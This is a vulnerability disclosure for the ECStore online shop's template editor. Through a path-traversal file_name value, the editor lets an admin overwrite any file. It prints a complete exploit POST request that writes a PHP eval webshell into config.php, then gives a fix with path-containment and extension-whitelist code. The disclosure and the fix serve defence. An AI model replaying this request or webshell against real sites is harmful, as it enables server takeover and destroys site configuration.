ECStore open-source online shop system: arbitrary file modification vulnerability (leads to a webshell)
Brief description:
The file editing function of the template editor does not strictly restrict which files may be edited, so any file on the system can be overwritten.
In the file editing function, pick a file to modify; an image is used here, but a template file works equally well. When the image is then uploaded, set the file_name parameter to the path of any PHP file on the site, such as /index.php or /config.php, and use webshell code as the image content. The path is not confined to the theme directory, so the upload is written wherever file_name points.
The POST request is as follows:
POST /index.php/shopadmin/index.php?app=site&ctl=admin_explorer_theme&act=save_image HTTP/1.1
Host: shop.xxx.com
Content-Length: 846527
Cache-Control: max-age=0
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxx

------WebKitFormBoundaryHSNjVhgvrpnTmmQD
Content-Disposition: form-data; name="theme"

ecstore
------WebKitFormBoundaryHSNjVhgvrpnTmmQD
Content-Disposition: form-data; name="open_path"


------WebKitFormBoundaryHSNjVhgvrpnTmmQD
Content-Disposition: form-data; name="file_name"

../../config/config.php
------WebKitFormBoundaryHSNjVhgvrpnTmmQD
Content-Disposition: form-data; name="upfile"; filename="Desert.jpg"
Content-Type: image/jpeg

<?php @eval($_POST['chopper']);?>
------WebKitFormBoundaryHSNjVhgvrpnTmmQD
Content-Disposition: form-data; name="has_bak"

1
------WebKitFormBoundaryHSNjVhgvrpnTmmQD--
The same problem exists when editing HTML or XML files through the template editor.
The webshell connects successfully and a shell is obtained. Because the config file itself was overwritten, the site stops working afterwards.
Solution:
Restrict the value of the file_name parameter: canonicalize the target path and refuse anything that resolves outside the template directory, and only allow the file extensions the template editor is meant to handle. Files outside the template directory must never be writable through this function.
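The following is an added example of the containment check described above; it is not ECStore's own code, and the function names, the allowed-extension list and the demo directory are assumptions for illustration. Instead of checking the user-supplied string for "..", it canonicalizes the parent directory of the target with realpath, re-appends the basename, and verifies that the result still lies under the theme directory. Canonicalizing the parent rather than the file itself is what makes the check work for a file that does not exist yet, which is the normal case for a new image upload.

```php
<?php
// Added example (not ECStore code): confine a template-editor write to the theme directory.
// resolveThemeFile() and saveThemeFile() are hypothetical names chosen for this write-up.

/**
 * Resolve $fileName relative to $themeDir and refuse anything that escapes it.
 * Returns the absolute target path, or null when the request must be rejected.
 */
function resolveThemeFile(string $themeDir, string $fileName, array $allowedExt): ?string
{
    // Reject empty names, NUL bytes, backslashes and absolute paths outright.
    if ($fileName === '' || strpos($fileName, "\0") !== false || strpos($fileName, '\\') !== false) {
        return null;
    }
    if ($fileName[0] === '/' || preg_match('/^[A-Za-z]:/', $fileName)) {
        return null;
    }

    $name = basename($fileName);
    if ($name === '.' || $name === '..') {
        return null;
    }

    // Whitelist of extensions the editor is meant to handle; .php is deliberately absent.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }

    $base = realpath($themeDir);
    if ($base === false) {
        return null;
    }

    // Canonicalize the parent directory (this follows symlinks and collapses "..")
    // and re-append the basename, so a not-yet-existing target file is still checked.
    $parent = realpath($base . '/' . dirname($fileName));
    if ($parent === false) {
        return null;
    }
    $target = $parent . '/' . $name;

    // Containment check: the canonical parent must be the theme dir or a subdirectory of it.
    if ($parent !== $base && strpos($parent, $base . '/') !== 0) {
        return null;
    }
    return $target;
}

/**
 * Write $content to the validated target; returns false when file_name is rejected.
 */
function saveThemeFile(string $themeDir, string $fileName, string $content): bool
{
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'html', 'xml'];
    $target = resolveThemeFile($themeDir, $fileName, $allowed);
    if ($target === null) {
        return false;
    }
    return file_put_contents($target, $content, LOCK_EX) !== false;
}

// Demo with a constructed theme directory under the system temp dir.
$themeDir = sys_get_temp_dir() . '/ecstore_demo_theme';
@mkdir($themeDir . '/images', 0700, true);
$allowed = ['jpg', 'jpeg', 'png', 'gif', 'html', 'xml'];

// A legitimate image inside the theme directory resolves to a path.
var_dump(resolveThemeFile($themeDir, 'images/Desert.jpg', $allowed));
// The file_name value from the request above is rejected.
var_dump(resolveThemeFile($themeDir, '../../config/config.php', $allowed));
// Traversal through a real subdirectory is rejected as well.
var_dump(resolveThemeFile($themeDir, 'images/../../../config/config.php', $allowed));
// A PHP file inside the theme directory is rejected by the extension whitelist.
var_dump(resolveThemeFile($themeDir, 'shell.php', $allowed));
```

Note that the extension whitelist matters on its own: even with the directory confined, allowing a .php target inside the theme directory would still give an authenticated template editor a webshell, so the path check and the extension check have to be applied together.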